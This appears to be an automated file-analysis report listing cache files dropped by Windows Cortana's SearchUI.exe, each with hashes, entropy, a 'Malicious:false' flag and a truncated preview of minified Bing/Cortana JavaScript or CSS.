                      SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                      Malicious:false
                      Preview: !function(t,e){if("object"==typeof exports&&"object"==typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var n=e();for(var i in n)("object"==typeof exports?exports:t)[i]=n[i]}}(this,function(){return function(t){function e(i){if(n[i])return n[i].exports;var r=n[i]={exports:{},id:i,loaded:!1};return t[i].call(r.exports,r,r.exports,e),r.loaded=!0,r.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(1)},function(t,e,n){"use strict";var i=n(2);e.AWTPiiKind=i.AWTPiiKind;var r=n(3);e.AWT=r["default"],e.AWT_COLLECTOR_URL_UNITED_STATES="https://us.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_GERMANY="https://de.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_JAPAN="https://jp.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_AUSTRALIA="https://au.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_EUROPE="https://eu.pipe.aria.microsoft.com/Collector/3.0/"},function(t,e){"use st
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):1524
                      Entropy (8bit):5.113989659252064
                      Encrypted:false
                      SSDEEP:24:FhMzkuYmRdyVYu8nVHcJDDOXOI6bslnTUGqqJlnCM:3Mr1RdyVvUgDQFTkCJ
                      MD5:274B4E069C08C8B319F54D8A26F2C3CA
                      SHA1:FB49944AC40D01ADC34D7D86498C5FEBB5D77D32
                      SHA-256:9007244EF551F42176E17D4172C1C4FFF1D35E362C83631E13E83FFBDB4E96B3
                      SHA-512:451C688F04304E7D04725D92ADF6DBE9A61E132110824A61C5B11A4B840520006D94BA2A682D38B88BC0B20F56769733255ACF87431CFB26ED6CC7DFB78DAB4B
                      Malicious:false
                      Preview: z{a:1}.b_scopebar{background-color:#eee}.b_scopebar,.b_scopebar a,.b_scopebar a:visited,#b_header .b_symb{color:#767676}.b_scopebar li.b_active a,.b_scopebar li.b_active a:visited,.b_scopebar span{border-color:#f84e29;color:#000}.b_scopebar a,.b_scopebar span{text-decoration:none;text-transform:uppercase}.b_scopebar a{text-transform:capitalize}#b_header:not(:empty){border-bottom:1px solid #ccc;position:fixed;top:0;width:100%;z-index:1000}#b_header .b_symb{float:left}body[dir] #b_header .b_symb{margin:10px 10px 0 10px}body[dir='rtl'] #b_header .b_symb{float:right}.b_scopebar li{display:inline-flex}body[dir] .b_scopebar li{margin:0 10px}.b_scopebar li:last-child{flex:none}body[dir='ltr'] .b_scopebar li:last-child{margin-right:12px}body[dir='rtl'] .b_scopebar li:last-child{margin-left:12px}body[dir='ltr'] .b_scopebar li:first-child{margin-left:12px}body[dir='rtl'] .b_scopebar li:first-child{margin-right:12px}.b_scopebar ul{overflow-x:auto;white-space:nowrap;-ms-overflow-style:none}body[di
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):45447
                      Entropy (8bit):4.519302585237155
                      Encrypted:false
                      SSDEEP:768:J0IPAyG9+tOMwFqTWbHUSiuAwmvqWf/LyZsXoUklYv/er/r3OwYEFGH0RhB78Wb+:J0IPX3f+Dglat5kmtW
                      MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                      SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                      SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                      SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                      Malicious:false
                      Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,25)>.5?t(n,282)>.39824?.69957:t(n,11)>.5?-.10865:t(n,0)>.11348?-.43924:-.84281:t(n,10)>1.5?t(n,282)>.74998?.96874:t(n,264)>.2555?t(n,10)>2.5?t(n,103)>.75004?t(n,158)>4595?.45522:.86367:t(n,16)>4800.5?t(n,0)>.37977?.70215:.19872:t(n,8)>.5?t(n,38)>390296.5?.40772:.75656:.18243:t(n,2)>1.5?.4651:-.16901:t(n,41)>.1765?.90432:.44919:t(n,282)>.70002?.68892:t(n,2)>2.5?t(n,16)>3320.5?-.30696:.07806:-.53174}function r(n){return t(n,25)>.5?t(n,282)>.49998?.59407:t(n,17)>.77996?-.15554:-.67158:t(n,10)>1.5?t(n,282)>.66667?.80523:t(n,10)>3.5?t(n,41)>.5175?.77296:t(n,8)>.5?t(n,158)>6310.5?.272:t(n,38)>29401304?.07058:.63578:.16914:t(n,94)>.57635?t(n,39)>.0305?.32237:.68096:t(n,2)>2.5?t(n,38)>3203480.5?.02127:.50932:t(n,16)>5365.5?t(n,296)>.8325?-.37343:.20213:.1316:t(n,282)>.77894?.58741:t(n,16)>3833?-.41734:t(n,103)>.63135?.09324:-.23768}function u(n){return t(n,25)>.5?t(n,282)>.307
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):20407
                      Entropy (8bit):5.305440084477046
                      Encrypted:false
                      SSDEEP:384:Kncvz0mcLDICWE8RtoW0W6jYRmUo0YZA9kE:BLo0CWE8RzQUcA9B
                      MD5:DBA3A107C2F712A09965545FB5C09FAF
                      SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                      SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                      SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                      Malicious:false
                      Preview: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:"."}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;color:#000;content:"."}.sw_playa:after,.sw_playd:after{color:#767676}.sw_playp:after{content:"."}.sw_plus:after,.sw_up:after,.sw_down:after{font-size:12px}.sw_down:after{content:"."}.sw_up:after{content:"."}.sw_st,.sw_sth,.sw_ste{line-height:12px}body[dir='ltr'] .sw_st,body[dir='ltr'] .sw_sth,body[dir='ltr'] .sw_ste{padding-right:1px}body[dir='rtl'] .sw_st,body[dir='rtl'] .sw_sth,body[dir='rtl'] .sw_ste{padding-left:1px}.sw_st:after,.sw_sth:before,.sw_sth:after,.sw_ste:after{font-size:12px;display:inline-block;color:#000}.sw_st:after{content:"."}.sw_sth{white-space:nowrap}.sw_sth:before{content:"."}body[dir='ltr'] .sw_sth:before{margin-right:-12px}body[dir='rtl'] .sw_sth:before{margin-left:-12px}.sw_sth:after{content:".";co
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):8204
                      Entropy (8bit):5.24502306901906
                      Encrypted:false
                      SSDEEP:192:jTceevz/oCfPJQhDEWaMLccp+pZNpPpGIp6/rktQeH+t0B6LB+T1k:jTceevzlrDkmVRn6jk2OB6V+T1k
                      MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                      SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                      SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                      SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                      Malicious:false
                      Preview: var FailedPromise=function(){function n(){this.isActive=!0;this.operation=null}return n.prototype.then=function(n,t){return this.handleError(t),this},n.prototype.done=function(n,t){this.handleError(t)},n.prototype.handleError=function(n){this.isActive&&n&&_w.setImmediate(function(){return n(null)})},n.prototype.cancel=function(){this.isActive=!1},n}(),ThresholdUtilitiesM2=function(){function n(){this.regExes={};this.guidCleaner=/[-{}]/g;this.isFirstPageStart=!0;this.startTime=_w.performance?_w.performance.timing.navigationStart:si_ST;this.apiSequenceNumber=0;this.headersAsyncPromise=null;this.headersCallComplete=!1;this.cortanaHeaders=null;this.themeColor=null;this.isDarkTheme=null;this.headersCallTimeout=3e3;this.headersCallbacks=[];this.rtlLangs=["ar","dv","fa","he","ku-arab","pa-arab","prs","ps","sd-arab","syr","ug","ur","qps-plocm"];sj_evt.bind("ajax.threshold.authChanged",sj_dm(this,this.clearLocalCache),1);sj_evt.bind("ajax.threshold.pageStart",sj_dm(this,this.onPageStart),1)}ret
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\lSzONrEv32rFv3DQRdlSkoDGGY0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):103802
                      Entropy (8bit):6.294860966135571
                      Encrypted:false
                      SSDEEP:1536:Khk1qk7tqk7JRGgK+XoHHCtVH45saoLwl3TQesqbjDiMhByt/Gk7bbFZjwzVCU:rL8HCtVHdLwqsiyBCPmCU
                      MD5:4E20ABD287CF6AE15999E19C0576124C
                      SHA1:D07CC599F89272C12C47B6F84C83C9F4CB8BBF61
                      SHA-256:886B00A6FF472267A085E5802210A2E6DA9CD5E92ACD3DDCB3EBFF89574B8054
                      SHA-512:24BB2C128545B8C0A298F6A90FFA61D1C5A38E4B6CC2483A6BBD9E1B184E40BF12A10D4C42A4842FE863B680739A56AD237775C123C8964ACB3DE8C63CA519FA
                      Malicious:false
                      Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"LocStrings",namespace:"Feedback"},{DIALOG_ALIAS_ERROR_TEXT:t[0],DIALOG_ALIAS_LABEL:t[1],DIALOG_ALIAS_TEXT:t[2],DIALOG_ASK_FEEDBACK:t[3],DIALOG_CANCEL_BUTTON_TEXT:t[4],DIALOG_COMMENT_ERROR_TEXT:t[5],DIALOG_COMMENT_LABEL:t[6],DIALOG_COMMENT_TYPE_LABEL:t[7],DIALOG_COMMENT_TYPE1:t[8],DIALOG_COMMENT_TYPE2:t[9],DIALOG_COMMENT_TYPE3:t[10],DIALOG_COMMENT_TYPE4:t[11],DIALOG_COMMENT_TYPE5:t[12],DIALOG_COMMENT_TYPE6:t[13],DIALOG_INCLUDE_SCREENSHOT:t[14],DIALOG_MSFT_INTERNAL:t[15],DIALOG_PRIVACY_POLICY:t[16],DIALOG_SEND_BUTTON_TEXT:t[17],DIALOG_SEND_EMAIL_LABEL:t[18],LEARN_MORE_LINK_TEXT:t[19],PRIVACY_STATEMENT_LINK_TEXT:t[20],REPORT_LEGAL_OR_PRIVACY_CONCERN:t[21],WINDOWS_DIALOG_COMMENT_TEXT:t[22],WINDOWS_TITLE_TEXT:t[23]}),i}return i(n,t)})("af",["Voer asseblief jou alias in.","en cc my by","Voer jou alias hier in.","Het jy enige spesifieke terugvoer?","Kanselleer","Laat 'n kommentaar asseblief.","Teksvenster vir j
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):66986
                      Entropy (8bit):6.002532652367151
                      Encrypted:false
                      SSDEEP:1536:Rk0h26JqMsJrdUPBERLxAMP7a5zjEMQBNRDIu/QAwape4:Rlv1sLRMz43BNFB
                      MD5:4D3E595F2CBC3A17F1AF84725C46E751
                      SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                      SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                      SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                      Malicious:false
                      Preview: @font-face{font-family:"Cortana MDL2 Assets";src:url(data:application/font-woff;base64,d09GRgABAAAAAMPYAA8AAAABZLgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABWAAAAEcAAABgSk1/HFZETVgAAAGgAAACBQAABeCBXolxY21hcAAAA6gAAATGAAAHduvLLe9jdnQgAAAIcAAAACAAAAAqCdkJr2ZwZ20AAAiQAAAA8AAAAVn8nuaOZ2FzcAAACYAAAAAMAAAADAAIABtnbHlmAAAJjAAAr/MAAT7+nuWqJmhlYWQAALmAAAAANQAAADYU7N7gaGhlYQAAubgAAAAeAAAAJCI8G3pobXR4AAC52AAAAUwAAAVU35GbmGxvY2EAALskAAACuAAAArg0Ln62bWF4cAAAvdwAAAAgAAAAIAJJBQ1uYW1lAAC9/AAABTkAAAvzNvtzeXBvc3QAAMM4AAAAEwAAACD/UQB3cHJlcAAAw0wAAACJAAAA03i98g542mNg5ghnnMDAysDBOovVmIGBURpCM19kSGMS4mBl5WJkYgQDBiAQYEAA32AFBQYHBobv3RxgPoRkAKtjgfAUGBgAq2sHLQB42hXJUxQYBgAEwclf2qa2bdu2bdu2bdu2bdu2bTtlur15734WAwz4fwYZPHCIgWGoMHQYJqqD+mHDcGH4MEIYMYwURg6jhFHDaGH0MEYYM4wVxg7jhHHDeGH8MEGYMEwUJg6ThEnDZGHyMEWYMkwVpg7ThGnDdGH6MEOYMcwUZg6zhFnDbGH2MEeYM8wV5g7zhHnDfGH+sEBYMCwUFg6LhEXDYmHxsERYMiwVlg7LhGXDcmH5sEJYMawUVg6rhFXDamH1sEZYM6wV1g7rhHXDemH9sEHYMGwUNg6bhE3DZmHzsEXYMmwVtg7bhG3DdmH7sEPYMewUdg67hF3DbmH3sEfYM+wV9g77hH3Df
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\p_H40Ndq102p2Socno0_V88cqhw[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):8313
                      Entropy (8bit):6.052018977754187
                      Encrypted:false
                      SSDEEP:192:9Acfyf9Kn8i/kzSRS7cb8xM/Qbs3CyzSz/Wp:Wcfyf9K8i/kzSRycbdQbsWLWp
                      MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                      SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                      SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                      SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                      Malicious:false
                      Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"MicrosoftSearch",namespace:"WindowsSearchBox"},{MsbPeopleContacts:t[0],MsbPeopleGroups:t[1],MsbReverifyAccount:t[2],MsbVerifyAccount:t[3]}),i}return i(n,t)})("ar",[".... .......",".........",".... .. ..... ..... .. ....... ..... .. {0}",".... .. ..... ..... .. ....... ....."])("bg",["........",".....",".......... ....... .., .. .. ....... .......... .. ........ .. .. {0}",".......... ....... .. .. ....... . ......... .........."])("ca",["Contactes","Grups","Verifiqueu el compte per cercar informaci. de la feina des de {0}","Verifiqueu el compte per cercar informaci. de la feina"])("cs",["Kontakty","Skupiny","Chcete-li vyhledat pracovn. informace z adresy {0}, ov..te sv.j ..et","Chcete-li vyhledat pracov
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\pdDKwBCexH8cKQFyK4LcJkh-gFc[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):15982
                      Entropy (8bit):5.276709297927942
                      Encrypted:false
                      SSDEEP:384:OiD8Rj/n+B3VRAATV7/ClGAbyI4PLOEfDE:dD4q1TV7/ClGAbyI4PLOEQ
                      MD5:9A082EADBD1B7FBA36DBF3EBFABC9481
                      SHA1:0450300D6CAF3A442FCD9E96F01AAF9BFDF1499A
                      SHA-256:3CA375F13414EC46DA069933CEE2D1693F0A874B6994CB4A38C34B9C01BA24CA
                      SHA-512:9AAB0EBB375F28F716521B9F6ABA8F0116AAC2BC4730AF1E849D5D7E959D59A4F67445A23A05D207782B799C88967971EDA493F97CB7D836609A4EAAA3D4491F
                      Malicious:false
                      Preview: html{-ms-user-select:none;overflow-y:hidden;overflow-x:hidden;cursor:default}body[dir] table,body[dir] td{margin:0;padding:0}body{font-size:15px;line-height:20px;font-family:"Segoe UI",Arial,Helvetica,Sans-Serif;color:#000}body[dir]{margin:0}body .tallUx{font-size:13px}#root{overflow:hidden}.absoluteForMeasuring{position:absolute;width:1000px}.groupHeader{display:flex;color:rgba(0,0,0,.6);font-size:13px;line-height:17px}body[dir] .groupHeader{padding:8px 12px}body[dir] .rs5UX .groupHeader{padding:8px 8px}.b_secondaryFocus{font-size:15px;line-height:20px}body[dir] .b_secondaryFocus{padding-bottom:0}.simpleContainer{display:flex}body[dir] .simpleContainer{padding:8px 12px}body[dir='ltr'] .rs5UX .suggestion .simpleContainer{padding-left:8px;padding-right:8px}body[dir='rtl'] .rs5UX .suggestion .simpleContainer{padding-right:8px;padding-left:8px}.detailVerticalBox{display:flex;flex-direction:column;flex:1;overflow:hidden}.suggestion.rich .richContainer{top:-132px}.richContainer{position:rel
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\xHnNQ3wW6s9nBB6qzyP9T8jw4bY[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):258178
                      Entropy (8bit):5.366121248495626
                      Encrypted:false
                      SSDEEP:6144:5NHCYqdoQG/Fau5PSB8J/8Wfj00mGdUMWsrIud:/NFauR5mQ
                      MD5:3E213BC387DB9E197F5163BF6CA2F721
                      SHA1:01491CF86180CD7501FAD911534D8A0E6968C2D3
                      SHA-256:066069DB265B55B9760C443974E5E0EB168076C0EFB3225900E50D167D41DDD8
                      SHA-512:70C6510FF0AB9140DE64C6CA8141743FA925F285825954BF47627A5CF8065A4F89E9B34DDA34500E864721B59EA784133452EA2474411A1D6B6DBCB9EBEE7FC4
                      Malicious:false
                      Preview: var __spreadArrays,WSB;(function(n){function t(){if(SearchAppWrapper.CortanaApp.hostingEnvironment==4)return 7;if(!n.isMiniSerpEnabled())return 0;var t=7;return n.config.allowAnswersToAutoOpenMiniSerp||(t&=-2),n.config.allowDNavToAutoOpenMiniSerp||(t&=-3),n.config.allowWebToAutoOpenMiniSerp||(t&=-5),t}var i=["::{679F85CB-0220-4080-B29B-5540CC05AAB6}","::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"],r=function(){function r(){this.refreshEntrypointApp()}return r.prototype.refreshEntrypointApp=function(){this.EntryPointApp=SearchAppWrapper.CortanaApp.hostingEnvironment==3?1:n.config.forceSettingsAppExperience?3:SearchAppWrapper.CortanaApp.hostingEnvironment==5||n.config.forceSantoriniExperience?4:SearchAppWrapper.CortanaApp.hostingEnvironment==4?2:0},r.prototype.clearDefaults=function(){this.QfMode=0;this.PreviewPaneAvailable=!1;this.MiniSERPMode=0;this.AlwaysWide=!1;this.SearchBoxOnTop=!0;this.AllowKeyboardNavCycling=!0;this.AllowKeyboardNavOffCanvas=!1;this.ScopesAvailable=!1;this.FlatListWi
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\z7yiT94xrmnuNX27pgHjE2p6KgQ[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):52943
                      Entropy (8bit):5.524994109560238
                      Encrypted:false
                      SSDEEP:1536:CMAy8XLTUO88FCSO6wlci0ibiIiHiU/cppI+TS:CFLT3CSO2i0ibiIiHiowTS
                      MD5:31DC2869D3C434A0E875008A833205D9
                      SHA1:340DC706965D273E2C6B4D018B0E86B5F0CDEF6D
                      SHA-256:5BB7C410575176CF4CD40D030CC7DF32460779E39EADA4E34DAE6B5C8D06F911
                      SHA-512:C1A0AEE2B17A8C24DD1942672895B43BADEC17308E0B0249497AF7DA9A781EBFD9CA21C7E97A7FAAFDD325E4E954CE42E6AC8503DF6C3902C6E01B11513B7A45
                      Malicious:false
                      Preview: var __spreadArrays,CoreUtilities,LoggerModule,VisibilityChangeHelperModule,HitHighlightingParserImpl,DataSourceLayoutManager,ThresholdDiagnosticsProd,FailedPromise,ThresholdUtilitiesM2;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){retu
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):202174
                      Entropy (8bit):4.353086485551748
                      Encrypted:false
                      SSDEEP:1536:nHHWGK3LUfMkjT35OqPrmqsoHh/yKdei6sBpxrjkwT6qt1SgtzjrsisQ1JLgRHX:2V
                      MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                      SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                      SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                      SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                      Malicious:false
                      Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,282)>.3896?t(n,282)>.38961?t(n,267)>.6104?t(n,39)>.0145?t(n,282)>.66669?t(n,38)>7124751?t(n,103)>.99997?.49246:.46311:.42968:.2235:t(n,3)>.03371?.4983:t(n,282)>.62505?t(n,25)>.503?t(n,47)>2.5?.44633:.30993:t(n,38)>223508416?.47784:t(n,269)>4502?t(n,269)>4565?.47772:t(n,284)>1.5?t(n,103)>.99997?.49992:.4902:.4969:.45473:.15382:t(n,267)>.61031?-.49998:.23231:.48906:t(n,0)>.50822?t(n,266)>.00112?-.29242:t(n,41)>.9715?.42523:t(n,41)>.3765?t(n,421)>.71793?t(n,38)>67927560?.44213:.43113:.3727:t(n,24)>.1855?-.031:.35364:t(n,103)>.98373?t(n,421)>.69234?t(n,266)>.00112?-.08047:.41851:t(n,94)>.7673?.4414:t(n,38)>5528556?t(n,94)>.17559?t(n,40)>.1685?.19613:-.26247:-.28885:.21078:t(n,266)>.24569?t(n,1)>.5?t(n,0)>.00477?t(n,266)>.25463?-.43181:t(n,264)>.53942?-.49933:-.27443:t(n,264)>.53942?t(n,266)>.25463?-.46023:-.49705:-.45348:t(n,38)>694628928?t(n,41)>.2425?t(n,267)>.6104?-.441
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):37342
                      Entropy (8bit):5.3267899861839485
                      Encrypted:false
                      SSDEEP:768:7nUURAWwEyypCXv8eBVjsRj838VtmJCG+A21TgXB6jAladSEPTurOiqUVXUiPKG7:D38Ey5jsRIsbmJQA4EXB6jAladSeTuTx
                      MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                      SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                      SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                      SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                      Malicious:false
                      Preview: var Microsoft,__extends,WindowsFeedback,Feedback;(function(n){var t;(function(t){"use strict";function e(t){for(var f=null,r,i,u=0;u<t.length;u++){r=t[u];try{i=r.provide()}catch(e){n.le("Query provider "+r.name+" failed",e)}if(typeof i=="string"&&i.length>0){f=i;break}}return f}function p(t){var r=t.querySelectorAll('input[type="radio"][required][name]'),i=!0;return n.Core.ForEach(r,function(n){var r=n.getAttribute("name"),u='input[type="radio"][required][name="'+r+'"]:checked',f=t.querySelector(u)!==null;i=i&&f}),i}function l(t,i){var r,u;return t===window?t.document.documentElement["client"+i]:t.nodeType===9?(r=t.documentElement,u=t.body,Math.max(u["scroll"+i],u["offset"+i],r["scroll"+i],r["offset"+i],r["client"+i])):parseFloat(n.Core.GetComputedStyle(t)[i.toLowerCase()])}function a(n,t,i){var u={},f;for(var r in t)u[r]=n.style[r],n.style[r]=t[r];f=i(n);for(r in t)n.style[r]=u[r];return f}function w(){y(!1)}function v(n){y(!0,n)}function y(t,i){n.Core.ForEach(_d.querySelectorAll('inp
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BG06Q2R0\--hmjjiJHWhRgEtIYT83RRVIm1E[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines
                      Category:dropped
                      Size (bytes):19775
                      Entropy (8bit):5.349039960637801
                      Encrypted:false
                      SSDEEP:384:KXOm2guCn7IultyC7hh6+fF5mWZ3BnqIfPhiGmVY4OtKAvKXAL5NuwK3++9O:wDa8R+uBpBnqIHeYPt4XALulO
                      MD5:C91FD6A20951ECA2C0CE3DB49982776F
                      SHA1:0B993CDC14CA5B5F5BBB8916575C06FBB6B09929
                      SHA-256:BA28010470516B9C630093B289BE6998F065EC8749FC50D58B09438348B998B9
                      SHA-512:E634C454B62EC2AEA323D3A312D383EBB2D494AA7E2C6AC9A0B7A8BA5EFD778AB7D60C56283BD156975693906EA63BB9FBCFB7CD4FAF24E1A856DBD56A0622EB
                      Malicious:false
